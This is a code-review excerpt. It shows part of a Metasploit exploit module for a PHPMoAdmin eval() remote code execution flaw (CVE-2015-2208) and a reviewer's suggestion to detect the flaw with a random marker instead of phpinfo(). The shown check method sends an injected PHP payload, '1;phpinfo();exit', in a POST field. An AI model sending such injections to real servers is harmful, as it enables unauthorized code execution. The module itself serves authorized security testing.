modules/exploits/multi/http/phpmoadmin_exec.rb

```diff
@@ -0,0 +1,81 @@
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'PHPMoAdmin Remote Code Execution',
+      'Description'    => %q{
+        This module exploits an arbitrary PHP command execution vulnerability due to a
+        dangerous use of eval() in PHPMoAdmin.
+      },
+      'Author'         =>
+        [
+          'Pichaya Morimoto pichaya () ieee org', # Public PoC
+          'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2015-2208' ],
+          [ 'EDB', '36251' ],
+          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Mar/19' ],
+          [ 'URL', 'http://seclists.org/oss-sec/2015/q1/743' ]
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets'        =>
+        [
+          [ 'PHPMoAdmin', { }  ],
+        ],
+      'DisclosureDate' => 'Mar 03 2015',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "The URI path of the PHPMoAdmin page", "/"])
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.to_s,'moadmin.php'),
+      'method'    => 'POST',
+      'vars_post' =>
+      {
+        'object'	=> '1;phpinfo();exit',
```

Comment:
The execution of `phpinfo()` results in a very large result. Would it not be better to instead use something smaller? For example, you could generate a random value, or a GUID, and have that printed to the output. If the value/GUID appears in the resulting body, then you've got a match. It also means that you're less likely to have a clash with something like "Build Date".